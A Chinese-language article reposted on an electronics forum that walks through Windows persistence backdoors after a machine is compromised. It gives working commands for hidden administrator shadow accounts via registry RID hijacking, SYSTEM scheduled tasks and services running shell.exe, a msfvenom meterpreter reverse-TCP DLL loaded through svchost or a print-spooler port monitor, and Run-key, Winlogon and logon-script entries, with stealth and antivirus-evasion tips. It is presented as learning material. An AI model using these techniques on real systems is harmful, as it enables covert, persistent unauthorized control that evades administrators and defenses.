0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看威廉希尔官方网站 视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

对常见的系统后门威廉希尔官方网站 及利用方式进行详细说明

jf_hKIAo4na 来源:FreeBuf.COM 2023-02-25 16:55 次阅读

0x00 前言

在获取到目标机器的权限后,如果想长时间的对目标进行控制,那么绕不开的一个操作就是权限持久化,为了实现这个目的,许许多多的后门威廉希尔官方网站 应运而生。因此,本文对常见的系统后门威廉希尔官方网站 进行了总结并对其利用方式进行了详细的说明,希望可以对大家的学习提供一些帮助。

0x01 创建影子账户

影子账户其实就是隐藏账户,无论通过 “计算机管理” 还是命令行查询都无法看到,只能在注册表中找到其信息。

hacker 常常通过创建具有管理员权限的影子账户,在目标主机上实现权限维持

注意需要拥有管理员级别的权限

下面来实操如何创建影子账户:

① 在目标机创建一个名为 “Hack” 的账户

net user Hack$ 123Abc!@# /add 
# “$” 符号表示该用户为隐藏账户,无法通过命令行查询到,但是通过计算机管理的 “本地用户和组” 可以看到隐藏用户

9c0f41ac-b01c-11ed-bfe3-dac502259ad0.jpg

此时,Hack$ 还是标准用户,为了使其拥有管理员级别的权限,还需要修改注册表。

② 在注册表中找到 HKEY_LOCAL_MACHINESAMSAM,单击右键,在弹出的菜单中选择 “权限” 选项,将 Administrator 用户的权限设置为 “完全控制”。

该注册表项的内容在标准用户和管理员权限下都是不可见的

9c32b362-b01c-11ed-bfe3-dac502259ad0.jpg

③ 在注册表项 HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames 处选择 Administrator 用户,在左侧找到与右边显示的键值的类型 “0x1f4” 相同的目录名。

9c58f806-b01c-11ed-bfe3-dac502259ad0.jpg

复制 000001F4 表项的 F 属性的值。

9c7f8980-b01c-11ed-bfe3-dac502259ad0.jpg

④ 在找到与隐藏账户 Hack$ 相应的目录 “000003EB”,将复制的 000001F4 表项中的 F 属性值粘贴到 000003EB 表项中的 F 属性值处,并确认。

9ca987da-b01c-11ed-bfe3-dac502259ad0.jpg

到此处,Hack$ 用户劫持了 Administrator 用户的 RID,从而使 Hack$ 用户获得 Administrator 用户的权限。

⑤ 分别选中注册表项 “Hack$” 和 “000003EB” 并导出,然后执行以下命令,删除 Hack$ 用户:

net user Hack$ /del

9cd195c2-b01c-11ed-bfe3-dac502259ad0.jpg

⑥ 将刚才导出的两个注册表项导入注册表。

9cfdb490-b01c-11ed-bfe3-dac502259ad0.jpg

到此,影子账户 Hack$ 就创建好了。此时查看 “本地用户和组” 也看不到该账户,只在注册表中才能看到。

9d1b06a8-b01c-11ed-bfe3-dac502259ad0.jpg

尝试使用影子账户登录远程桌面

9d4fa7b4-b01c-11ed-bfe3-dac502259ad0.jpg

9d6ec8d8-b01c-11ed-bfe3-dac502259ad0.jpg

0x02 计划任务后门

通过创建计划任务,让目标主机在特定的时间点或规定的周期内重复运行 hacker 预先准备的后门程序,从而实现权限持久化。

执行以下命令,在目标主机上创建一个名为 Backdoor 的计划任务,每 60 秒以 SYSTEM 权限运行一次后门程序 shell.exe。

schtasks /Create /TN Backdoor /SC minute /MO 1 /TR C:WindowsSystem32shell.exe /RU System /F
# /TN,指定要创建的计划任务的名称
# /SC,指定计划任务执行频率
# /MO,指定计划任务执行周期
# /TR,指定计划任务运行的程序路径
# /RU,指定计划任务运行的用户权限
# /F,如果指定的任务已经存在,则强制创建

注意:如果以 SYSTEM 权限运行计划任务,就需要拥有管理员级别的权限。

9da1b806-b01c-11ed-bfe3-dac502259ad0.jpg

当计划任务触发后,目标主机就会上线

9def1510-b01c-11ed-bfe3-dac502259ad0.jpg

计算机上所有的计划任务都存储在了 “计算机管理” 中的 “计划任务程序库”。

9e105888-b01c-11ed-bfe3-dac502259ad0.jpg

可以看到,计划任务在 “计划任务程序库” 中以类似文件目录的形式存储,所有计划任务都存储在最内层的目录中。因此,为了增强隐蔽性,建议在创建计划任务后门时遵守这个存储规范。

执行以下命令,在 MicrosoftWindowsAppTask 路径下创建一个名为 “AppRun” 的计划任务后门。

schtasks /Create /TN MicrosoftWindowsAppTaskAppRun /SC daily /ST 08:00 /MO 1 /TR C:WindowsSystem32shell.exe /RU System /F

9e44ac3c-b01c-11ed-bfe3-dac502259ad0.jpg

0x03 系统服务后门

对于启动类型为 “自动” 的系统服务,hacker 可以将服务运行的二进制文件路径设置为后门程序或其他攻击载荷,当系统或服务重启时,可以重新获取对目标主机的控制权。但是,前提条件是已经获取了目标主机的管理员权限。

1. 创建系统服务

执行以下命令,在目标主机上创建一个名为 Backdoor 的系统服务,启动类型为 “自动”,启动权限为SYSTEM:

sc create Backdoor binpath= "cmd.exe /k C:WindowsSystem32shell.exe" start= "auto" obj= "LocalSystem" 
# binpath,指定服务的二进制文件路径,注意 “=” 后必须有一个空格 
# start,指定启动类型 
# obj,指定服务运行的权限

9e684692-b01c-11ed-bfe3-dac502259ad0.jpg

系统或服务重启时,将以 SYSTEM 权限运行后门程序 shell.exe,目标主机就会上线。

9e8dec30-b01c-11ed-bfe3-dac502259ad0.jpg

2. 利用现有的系统服务

通过修改现有服务的配置信息,使服务启动时运行指定的后门程序。

hacker 可以通过 “sc config” 命令修改服务的 binpath 选项,也可以尝试修改服务注册表的 ImagePath 键,二者都直接指定了相应服务的启动时运行的二进制文件。

① 执行以下命令,将该服务注册表中的 ImagePath 键指向预先上传的攻击载荷。

reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRegSvc /v ImagePath /t REG_EXPAND_SZ /d "cmd.exe /k C:UsersPublicshell.exe" /f

② 系统或服务重启时,将以 SYSTEM 权限运行后门程序 shell.exe,目标主机就会上线。

9eb733e2-b01c-11ed-bfe3-dac502259ad0.jpg

3. 利用 svchost.exe 启动服务

svchost.exe 是 Windows 的系统文件,svchost.exe 是从动态链接库(DLL)中运行的服务的通用主机进程名称。该程序本身只是作为服务的宿主,许多系统服务通过注入该程序进程中启动,所以系统中会存在多个该程序的进程。

在 Windows 系统中,需要由 svchost.exe 进程启动的服务将以 DLL 形式实现。在安装这些服务时,需要将服务的可执行文件路径指向 svchost.exe。在启动这些服务时,由 svchost.exe 调用相应服务的 DLL 文件,而具体调用哪个 DLL 是由该服务在注册表的信息所决定的。

下面以 wuauserv 服务(Windows Update)为例进行讲解:

在注册表中定位到 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetserviceswuauserv。从 imagepath 键值可以得知,该服务启动的可执行文件的路径为 C:Windowssystem32svchost.exe -k netsvcs,说明该服务是依靠 svchost.exe 加载 DLL 文件来实现的。

9eded5b4-b01c-11ed-bfe3-dac502259ad0.jpg

wuauserv 服务的注册表下还有一个 Parameters 子项,其中的 ServiceDll 键值表明该服务由哪个 DLL 文件负责。当服务启动时,svchost.exe 就会加载 wuaueng.dll 文件,并执行其提供的具体服务。

9f08cb62-b01c-11ed-bfe3-dac502259ad0.jpg

注意:系统会根据服务可执行文件路径中的参数对服务进行分组,如 C:Windowssystem32svchost.exe -k netsvcs 表明该服务属于 netsvcs 这个服务组。通常,每个 svchost 进程负责运行一组服务。因此,并不是每启动一个服务就会增加一个 svchost.exe 进程。

svchost.exe 的所有服务分组位于注册表的 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvchost 中。通过 svchost.exe 加载启动的服务都要在该表项中注册。

9f36035c-b01c-11ed-bfe3-dac502259ad0.jpg

实战中,hacker 可以通过 svchost.exe 加载恶意服务,以此来建立持久化后门。由于恶意服务的 DLL 将加载到 svchost.exe 进程,恶意进程不是独立运行的,因此具有很高的隐蔽性。

接下来进行实操:

① 使用 msf 生成一个负责提供恶意服务的 DLL 文件,然后将生成的 DLL 上传到目标主机的 System32 目录。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.220.132 lport=6666 -f dll > reverse_tcp.dll

② 创建名为 Backdoor 的服务,并以 svchost 加载的方式启动,服务分组为 netsvc

sc create Backdoor binpath= "C:Windowssystem32svchost.exe -k netsvc" start= "auto" obj= "LocalSystem"

9f61161e-b01c-11ed-bfe3-dac502259ad0.jpg

③ 将 Backdoor 服务启动时加载的 DLL 设为 reverse_tcp.dll

reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesBackdoorParameters /v ServiceDll /t REG_EXPAND_SZ /d "C:WindowsSystem32
everse_tcp.dll"

9f8ca46e-b01c-11ed-bfe3-dac502259ad0.jpg

9fabb5f2-b01c-11ed-bfe3-dac502259ad0.jpg

④ 配置服务描述

reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesBackdoor /v Description /t REG_SZ /d "Windows Service"

9fceb034-b01c-11ed-bfe3-dac502259ad0.jpg

9ffbaeb8-b01c-11ed-bfe3-dac502259ad0.jpg

⑤ 配置服务显示名称

reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesBackdoor /v DisplayName /t REG_SZ /d "Backdoor"

a02536e8-b01c-11ed-bfe3-dac502259ad0.jpg

a0486b9a-b01c-11ed-bfe3-dac502259ad0.jpg

⑥ 创建服务新分组 netsvc,并将 Backdoor 服务添加进去

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvchost" /v netsvc /t REG_MULTI_SZ /d Backdoor

a06a6ab0-b01c-11ed-bfe3-dac502259ad0.jpg

a084af60-b01c-11ed-bfe3-dac502259ad0.jpg

⑦ 当系统重启时,Svchost 以 SYSTEM 权限加载恶意服务,目标主机就会上线。

a0ba4fe4-b01c-11ed-bfe3-dac502259ad0.jpg

a0ddaff2-b01c-11ed-bfe3-dac502259ad0.jpg

0x04 启动项/注册表键后门

hacker 可以通过将后门程序添加到系统启动文件夹或通过注册表运行键引用来进行权限持久化。添加的后门程序将在用户登录的上下文中启动,并且将具有与账户相关联的权限等级。

1. 系统启动文件夹

将程序放置在启动文件夹中会导致该程序在用户登录时执行。

Windows 系统有两种常见的启动文件夹:

# 位于以下目录中的程序将在指定用户登录时启动
 C:Users[Username]AppDataRoamingMicrosoftWindowsStart
 C:Users[Username]AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup
 
 # 位于以下目录中的程序将在所有用户登录时启动
 C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup

尝试将后门程序放入 hack 用户的启动文件夹

a120d4bc-b01c-11ed-bfe3-dac502259ad0.jpg

切换用户登录,成功上线

a1459432-b01c-11ed-bfe3-dac502259ad0.jpg

2. 运行键(Run Keys)

Windows 系统上有许多注册表项可以用来设置在系统启动或用户登录时运行指定的程序或加载指定 DLL 文件,hacker 可以对此类注册表进行滥用,以建立持久化后门。

当用户登录时,系统会依次检查位于注册表运行键(Run Keys)中的程序,并在用户登录的上下文中启动。Windows 系统默认创建以下运行键,如果修改 HKEY_LOCAL_MACHINE 下的运行键,需要拥有管理员级别的权限。

# 以下注册表项中的程序将在当前用户登录时启动
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce

# 以下注册表中的程序将在所有用户登录时启动
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce
HKEY_LOCAL_MACHINESOFTWAREWOW6432NodeMicrosoftWindowsCurrentVersionRun
HKEY_LOCAL_MACHINESOFTWAREWOW6432NodeMicrosoftWindowsCurrentVersionRunOnce

执行以下命令,在注册表运行键中添加一个名为 “Backdoor” 的键,并将键值指向后门程序的绝对路径。

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun" /v Backdoor /t REG_SZ /d "C:WindowsSystem32shell.exe"

a164da36-b01c-11ed-bfe3-dac502259ad0.jpg

a1874a26-b01c-11ed-bfe3-dac502259ad0.jpg

当用户重新登录时,目标主机就会上线。

a1a543be-b01c-11ed-bfe3-dac502259ad0.jpg

3. Winlogon Helper

Winlogon 是 Windows 系统的组件,用于处理与用户有关的各种行为,如登录、注销、在登录时加载用户配置文件、锁定屏幕等。这些行为由系统注册表管理,注册表中的一些键值定义了在 Windows 登录期间会启动哪些进程。

hacker 可以滥用此类注册表键值,使 Winlogon 在用户登录时执行恶意程序,以此建立持久化后门。

常见的有以下两个:

# 指定用户登录时执行的用户初始化程序,默认为 userinit.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserinit

# 指定 Windows 身份验证期间执行的程序,默认为 explorer.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonshell

执行以下命令,在 Userinit 键值中添加一个后门程序。

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Userinit /d "C:Windowssystem32userinit.exe,shell.exe" /f

a1c36966-b01c-11ed-bfe3-dac502259ad0.jpg

a1ea1da4-b01c-11ed-bfe3-dac502259ad0.jpg

当用户重新登录时,目标主机就会上线。

a209e80a-b01c-11ed-bfe3-dac502259ad0.jpg

注意:在滥用 Userinit 和 Shell 键时需要保留键值中的原有程序,将待启动的后门程序添加到原有程序后面,并以 “,” 进行分隔。并且,后面程序需要被上传至 C:Windowssystem32 目录。

4. Logon Scripts

Logon Scripts是优先于很多杀毒软件启动的,所以可以通过这种方式绕过杀毒软件敏感操作拦截。

执行以下命令,在 HKEY_CURRENT_USER/Enviroment 下新建字符串键值 UserInitMprLogonScript,键值设置为想要执行的程序或bat脚本的路径:

reg add "HKEY_CURRENT_USEREnvironment" /v UserInitMprLogonScript /t REG_SZ /d "C:Windowssystem32shell.exe"

a234a036-b01c-11ed-bfe3-dac502259ad0.jpg

a2534838-b01c-11ed-bfe3-dac502259ad0.jpg

重启系统或重新登陆账户,成功上线

a2726d12-b01c-11ed-bfe3-dac502259ad0.jpg

0x05 Port Monitors后门

打印后台处理服务(Print Spooler)负责管理 Windows 系统的打印作业。与该服务的交互是通过 Print Spooler API 执行的,其中包含 AddMonitor 函数,用于安装 Port Monitors(本地端口监听器),并连接配置、数据和监视器文件。AddMonitor 函数能够将 DLL 注入 spoolsv.exe 进程,以实现相应功能,并且通过创建注册表键,hacker 可以在目标系统上进行权限持久化。

注意:利用该威廉希尔官方网站 需要拥有管理员级别的权限。

① 通过 msf 生成一个 64 位的恶意 DLL

② 将生成的 DLL 上传到目标主机的 C:Windowssystem32 目录中,执行一下命令,通过编辑注册表安装一个端口监视器。

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlPrintMonitorsTestMonitor" /v "Driver" /t REG_SZ /d "reverse_tcp.dll"

a29c14e6-b01c-11ed-bfe3-dac502259ad0.jpg

a2b5c7f6-b01c-11ed-bfe3-dac502259ad0.jpg

当系统重启时,Print Spooler 服务在启动过程中会读取 Monitors 注册表项的所有子健,并以 SYSTEM 权限加载 Driver 键值所指定的 DLL 文件。

a2d9c0de-b01c-11ed-bfe3-dac502259ad0.jpg

0x06 总结

在本文的很多例子中,其实都会或多或少与一个东西有关,那就是注册表。关于注册表,我觉得值得花时间去仔细研究一番,一定会有很大的收获。

关于系统后门威廉希尔官方网站 其实还有许许多多,本文只是将常见的一些威廉希尔官方网站 拿出来进行了分享,希望可以对大家的学习有帮助。如有不对,欢迎指正。





审核编辑:刘清

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • System
    +关注

    关注

    0

    文章

    165

    浏览量

    36947
  • SAM
    SAM
    +关注

    关注

    0

    文章

    112

    浏览量

    33524
  • hacker
    +关注

    关注

    0

    文章

    4

    浏览量

    1365

原文标题:常见系统后门威廉希尔官方网站 总结与分析利用

文章出处:【微信号:菜鸟学安全,微信公众号:菜鸟学安全】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    求3525电路详细说明

    求3525电路详细说明,越详细越好,谢谢!
    发表于 04-18 08:21

    spi总线协议详细说明

    本帖最后由 eehome 于 2013-1-5 09:52 编辑 spi总线协议详细说明
    发表于 08-18 21:28

    hex文件格式详细说明

    hex文件格式详细说明
    发表于 11-13 12:36

    hex文件格式详细说明

    hex文件格式详细说明
    发表于 11-13 12:37

    stc下载烧录详细说明

    stc下载烧录详细说明
    发表于 01-05 16:28

    常见的隔离威廉希尔官方网站 详细说明

    遭受到有潜在危险的浪涌电流和电压。其次,它可以防止意外的接地回路,从数据链路和其它互连对信号造成干扰。电子发烧友网根据几种常见的隔离威廉希尔官方网站 做了详细说明。数字隔离
    发表于 07-24 08:07

    iic总线的详细说明

    iic总线的详细说明,协议说明,教程,学习
    发表于 11-16 19:05 0次下载

    八种常见汽车悬挂系统详细说明

    八种常见汽车悬挂系统详细说明
    发表于 01-19 21:15 17次下载

    进行单片机串口通信的方式详细说明

    本文档的主要内容详细介绍的是进行单片机串口通信的方式详细说明
    发表于 08-01 17:35 1次下载
    <b class='flag-5'>进行</b>单片机串口通信的<b class='flag-5'>方式</b><b class='flag-5'>详细说明</b>

    Keil编译的常见错误详细说明

    本文档的主要内容详细介绍的是Keil编译的常见错误详细说明
    发表于 09-30 17:28 23次下载
    Keil编译的<b class='flag-5'>常见</b>错误<b class='flag-5'>详细说明</b>

    51单片机中断系统的原理和结构详细说明

    本文档的主要内容详细介绍的是51单片机中断系统的原理和结构详细说明
    发表于 11-19 08:00 2次下载
    51单片机中断<b class='flag-5'>系统</b>的原理和结构<b class='flag-5'>详细说明</b>

    AD级联的工作方式配置和AD双排序的工作方式配置详细说明

    本文档的主要内容详细介绍的是AD级联的工作方式配置和AD双排序的工作方式配置详细说明
    发表于 12-23 08:00 2次下载
    AD级联的工作<b class='flag-5'>方式</b>配置和AD双排序的工作<b class='flag-5'>方式</b>配置<b class='flag-5'>详细说明</b>

    计算系统原理的中断系统详细说明

    本文档的主要内容详细介绍的是计算系统原理的中断系统详细说明包括了:中断的基本概念, 中断分类,中断优先级和嵌套, 中断处理过程, 嵌入式中断系统
    发表于 03-21 16:41 0次下载
    计算<b class='flag-5'>系统</b>原理的中断<b class='flag-5'>系统</b><b class='flag-5'>详细说明</b>

    时域离散信号和系统的教程详细说明

    本文档的主要内容详细介绍的是时域离散信号和系统的教程详细说明
    发表于 04-24 08:00 0次下载
    时域离散信号和<b class='flag-5'>系统</b>的教程<b class='flag-5'>详细说明</b>

    LabVIEW与Excel连接的教程详细说明

    文档的主要内容详细介绍的是LabVIEW与Excel连接的教程详细说明包括了:背景介绍,创建一个新的Excel表,打开一个现有的Excel表,利用LabVIEW对Excel进行修改
    发表于 05-12 08:00 45次下载
    LabVIEW与Excel连接的教程<b class='flag-5'>详细说明</b>